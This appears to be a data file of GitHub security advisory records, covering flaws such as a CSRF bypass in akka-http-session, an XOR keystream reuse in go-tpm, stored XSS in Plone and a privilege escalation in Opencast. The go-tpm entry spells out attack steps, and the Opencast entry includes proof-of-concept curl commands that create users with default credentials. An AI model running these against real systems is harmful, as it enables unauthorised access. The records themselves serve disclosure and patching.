This affects the package com.softwaremill.akka-http-session:core_2.12 from 0 and before 0.6.1; all versions of package com.softwaremill.akka-http-session:core_2.11; the package com.softwaremill.akka-http-session:core_2.13 from 0 and before 0.6.1. CSRF protection can be bypassed by forging a request that contains the same value for both the X-XSRF-TOKEN header and the XSRF-TOKEN cookie value, as the check in randomTokenCsrfProtection only checks that the two values are equal and non-empty.
{'CVE-2020-28452'}
2022-01-06T20:23:05Z
2022-01-06T20:23:05Z
HIGH
8.8
{'CWE-352'}
{'https://github.com/softwaremill/akka-http-session/commit/8725dccfc3143ac52304a51f4bbfda119d5ba3a1', 'https://snyk.io/vuln/SNYK-JAVA-COMSOFTWAREMILLAKKAHTTPSESSION-1058933', 'https://nvd.nist.gov/vuln/detail/CVE-2020-28452', 'https://github.com/softwaremill/akka-http-session/issues/77', 'https://snyk.io/vuln/SNYK-JAVA-COMSOFTWAREMILLAKKAHTTPSESSION-1046675', 'https://snyk.io/vuln/SNYK-JAVA-COMSOFTWAREMILLAKKAHTTPSESSION-1046674', 'https://github.com/advisories/GHSA-4jf5-jggp-g56j', 'https://github.com/softwaremill/akka-http-session/pull/79'}
null
GHSA
GHSA-962m-m8jw-8wrr
Path Traversal in Zope
Zope is an open-source web application server. In Zope versions prior to 4.6 and 5.2, users can access untrusted modules indirectly through Python modules that are available for direct use. By default, only users with the Manager role can add or edit Zope Page Templates through the web, but sites that allow untrusted users to add/edit Zope Page Templates through the web are at risk from this vulnerability. The problem has been fixed in Zope 5.2 and 4.6. As a workaround, a site administrator can restrict adding/editing Zope Page Templates through the web using the standard Zope user/role permission mechanisms. Untrusted users should not be assigned the Zope Manager role and adding/editing Zope Page Templates through the web should be restricted to trusted users only.
{'CVE-2021-32633'}
2021-08-31T21:04:33Z
2021-06-15T16:10:49Z
HIGH
8.8
{'CWE-22'}
{'http://www.openwall.com/lists/oss-security/2021/05/21/1', 'https://github.com/advisories/GHSA-962m-m8jw-8wrr', 'https://github.com/zopefoundation/Zope/security/advisories/GHSA-5pr9-v234-jw36', 'https://github.com/zopefoundation/Zope/commit/1f8456bf1f908ea46012537d52bd7e752a532c91', 'https://nvd.nist.gov/vuln/detail/CVE-2021-32633', 'http://www.openwall.com/lists/oss-security/2021/05/22/1', 'https://cyllective.com/blog/post/plone-authenticated-rce-cve-2021-32633/'}
null
GHSA
GHSA-5x29-3hr9-6wpw
TPM 1.2 key authorization values vulnerable to TPM transport eavesdropper in go-tpm
### Impact TPM 2.0 users are unaffected by this issue. An adversary eavesdropping on the TPM 1.2 transport path can calculate `usageAuth` for a key created with CreateWrapKey, even though this value is encrypted as part of the TPM 1.2 command protocol. The TPM 1.2 CreateWrapKey command accepts two secrets: `usageAuth` and `migrationAuth`. The ADIP protocol (TPM 1.2 specification, part 1, section 13.4) calls for these values to be encrypted with two different XOR keys. Due to a bug in go-tpm prior to version 0.3.0, both `usageAuth` and `migrationAuth` are encrypted with the same XOR keystream. This allows an adversary to XOR `encUsageAuth` and `encMigrationAuth` together to calculate `usageAuth ^ encMigrationAuth`. Since `migrationAuth` is moot for all keys created with go-tpm's `CreateWrapKey` (since all keys created with this function are marked non-migratable), an adversary may guess or know (from code/binary inspection) that `migrationAuth` is all 0x00 bytes or some other fixed value. Such an adversary can then calculate `usageAuth` and use this value later to improperly use the created key, unbeknownst to the creator of the key. ### Patches Fixed in go-tpm version 0.3.0. ### Workarounds - TPM 2.0 users: No workaround needed. This issue only affects TPM 1.2 users. - TPM 1.2 users: Call CreateWrapKey with a random 20-byte value for `migrationAuth`, even though that value is not used again (since CreateWrapKey creates keys that are non-migratable). Do not store or log this value. ### Details TPM 1.2 uses a protocol called ADIP (Authorization Data Insertion Protocol) to encrypt authorization values over-the-wire for newly created objects. This prevents a bus-snooping attack like those publicized by TPM Genie. TPM 2.0 makes this optional (the way to do it is with parameter-encryption sessions). You can read more about ADIP in section 13.4 of Part 1: Design Principles in the latest [TPM 1.2 specification](https://trustedcomputinggroup.org/resource/tpm-main-specification/). Normally, ADIP consists of the following steps: ``` Key := SHA1(authSession.SharedSecret || a nonce) Note: nonces and auth values in TPM 1.2 are always 20 bytes EncAuth := XOR(Key, Auth) ``` When commands require one ADIP-encrypted auth value, the nonce is the last nonceEven (last nonce from the TPM). When commands require two ADIP-encrypted auth values, the nonce for the first auth value is still nonceEven, and the nonce for the second auth value is the last nonceOdd, which is the one being provided by the caller along with the current command on the session. The reason for this is that you wouldn't want an adversary to be able to XOR the two encrypted auth values together and come up with (auth 1 XOR key) XOR (auth 2 XOR key) where the "one-time" pad key is used twice and cancels itself out. Here are the commands that take one authorization value by ADIP: - Seal (the sealed data's auth value) - Sealx (the sealed data's auth value) - CreateKey (the key's auth value) - MakeIdentity (the AIK's auth value) - ChangeAuth (the entity's new auth value) - ChangeAuthOwner (the new owner auth value) - Delegate_CreateKeyDelegation (the new delegation auth value) - Delegate_CreateOwnerDelegation (the new delegation auth value) - NV_DefineSpace (the NV's auth value) - CreateCounter (the counter's auth value) Here are the commands that take two authorization values by ADIP: - CreateWrapKey (the key's auth value, and the key's migration (to export out of the TPM) auth value) The migrationAuth value is never used if the key does not have the TPM_KEY_FLAGS.migratable flag set on it. go-tpm does not currently allow the caller to set this flag. Here was the bug in our implementation of CreateWrapKey(): https://github.com/google/go-tpm/blob/16766ac4521425bd02ad23868fbdf24749268669/tpm/tpm.go#L1322-L1329 Here we see that both usageAuth and migrationAuth are encrypted by the same XOR key. This is the correct key (i.e., it is based on nonceEven) for usageAuth, but not migrationAuth. This means 2 things: **First: migrationAuth is being set to some value that is effectively unrelated to migrationAuth as passed by the caller.** Again, this is not interesting to all current callers (given that there is no way for them to pass TPM_KEY_FLAGS.migratable via the current API; migrationAuth is not a meaningful value). **Second, and much more importantly: a user of go-tpm is vulnerable to the following attack by a passive bus-snooping adversary (CVE-2020-8918)** Wait for a CreateWrapKey command Collect encUsageAuth and encMigrationAuth Calculate (usageAuth XOR migrationAuth) := (encUsageAuth XOR encMigrationAuth) Assuming migrationAuth is all 0x00 (a reasonable assumption for a caller who knows the key is not migratable), the calculation in (3) is the usage auth of the key.
{'CVE-2020-8918'}
2022-04-19T19:02:31Z
2022-02-11T23:18:09Z
HIGH
7.1
{'CWE-665'}
{'https://nvd.nist.gov/vuln/detail/CVE-2020-8918', 'https://github.com/google/go-tpm/security/advisories/GHSA-5x29-3hr9-6wpw', 'https://github.com/advisories/GHSA-5x29-3hr9-6wpw', 'https://github.com/google/go-tpm/pull/195'}
null
GHSA
GHSA-gvcp-948f-8f2p
Use of Uninitialized Resource in libp2p-deflate
An issue was discovered in the libp2p-deflate crate before 0.27.1 for Rust. An uninitialized buffer is passed to AsyncRead::poll_read(), which is a user-provided trait function.
{'CVE-2020-36443'}
2021-08-25T20:59:04Z
2021-08-25T20:59:04Z
CRITICAL
9.8
{'CWE-908'}
{'https://nvd.nist.gov/vuln/detail/CVE-2020-36443', 'https://rustsec.org/advisories/RUSTSEC-2020-0123.html', 'https://github.com/advisories/GHSA-gvcp-948f-8f2p'}
null
GHSA
GHSA-3v5x-qjrp-q2hq
Unrestricted Upload of File with Dangerous Type in ButterCMS
An arbitrary file upload vulnerability in the file upload component of ButterCMS v1.2.8 allows attackers to execute arbitrary code via a crafted SVG file.
{'CVE-2022-27260'}
2022-04-26T18:01:52Z
2022-04-13T00:00:24Z
CRITICAL
9.8
{'CWE-434'}
{'https://github.com/advisories/GHSA-3v5x-qjrp-q2hq', 'https://www.youtube.com/watch?v=Tw8OhtVd-mE', 'https://nvd.nist.gov/vuln/detail/CVE-2022-27260', 'https://github.com/ButterCMS/buttercms-js'}
null
GHSA
GHSA-hm2h-f456-6j88
Cross-site scripting in Plone
Plone through 5.2.4 allows stored XSS attacks (by a Contributor) by uploading an SVG or HTML document.
{'CVE-2021-33512'}
2021-06-08T23:20:04Z
2021-06-08T23:20:04Z
MODERATE
5.4
{'CWE-79'}
{'http://www.openwall.com/lists/oss-security/2021/05/22/1', 'https://nvd.nist.gov/vuln/detail/CVE-2021-33512', 'https://plone.org/security/hotfix/20210518/stored-xss-from-file-upload-svg-html', 'https://github.com/advisories/GHSA-hm2h-f456-6j88'}
null
GHSA
GHSA-94qw-r73x-j7hg
Users with ROLE_COURSE_ADMIN can create new users in Opencast
### Impact Users with the role `ROLE_COURSE_ADMIN` can use the user-utils endpoint to create new users not including the role `ROLE_ADMIN`. For example: ```bash # Use the admin to create a new user with ROLE_COURSE_ADMIN using the admin user. # We expect this to work. % curl -i -u admin:opencast 'https://example.opencast.org/user-utils/xy.json' -X PUT \ --data 'password=f&roles=%5B%22ROLE_COURSE_ADMIN%22%5D' HTTP/2 201 # Use the new user to create more new users. # We don't expüect a user with just role ROLE_COURSE_ADMIN to succeed. # But it does work % curl -i -u xy:f 'https://example.opencast.org/user-utils/ab.json' -X PUT \ --data 'password=f&roles=%5B%22ROLE_COURSE_ADMIN%22%5D' HTTP/2 201 ``` `ROLE_COURSE_ADMIN` is a non-standard role in Opencast which is referenced neither in the documentation nor in any code (except for tests) but only in the security configuration. From the name – implying an admin for a specific course – users would never expect that this role allows user creation. ### Patches This issue is fixed in 7.6 and 8.1 which both ship a new default security configuration. ### Workarounds You can fix this issue by removing all instances of `ROLE_COURSE_ADMIN` in your organization's security configuration (`etc/security/mh_default_org.xml` by default). ### For more information If you have any questions or comments about this advisory: - Open an issue in [opencast/opencast](https://github.com/opencast/opencast/issues) - For security-relevant information, email us at security@opencast.org
{'CVE-2020-5231'}
2021-10-20T18:03:32Z
2020-01-30T21:21:37Z
MODERATE
4.8
{'CWE-285'}
{'https://github.com/advisories/GHSA-94qw-r73x-j7hg', 'https://github.com/opencast/opencast/commit/72fad0031d8a82c860e2bde0b27570c5042320ee', 'https://github.com/opencast/opencast/security/advisories/GHSA-94qw-r73x-j7hg', 'https://nvd.nist.gov/vuln/detail/CVE-2020-5231'}
null
GHSA
GHSA-g4h2-4wvh-grc5
Uncontrolled Resource Consumption in simple_asn1
An issue was discovered in the simple_asn1 crate 0.6.0 before 0.6.1 for Rust. There is a panic if UTCTime data, supplied by a remote attacker, has a second character greater than 0x7f.
{'CVE-2021-45711'}
2022-01-07T18:25:30Z
2022-01-06T22:05:05Z
HIGH
7.5
{'CWE-400'}
{'https://nvd.nist.gov/vuln/detail/CVE-2021-45711', 'https://rustsec.org/advisories/RUSTSEC-2021-0125.html', 'https://github.com/advisories/GHSA-g4h2-4wvh-grc5', 'https://github.com/acw/simple_asn1/issues/27', 'https://raw.githubusercontent.com/rustsec/advisory-db/main/crates/simple_asn1/RUSTSEC-2021-0125.md'}
null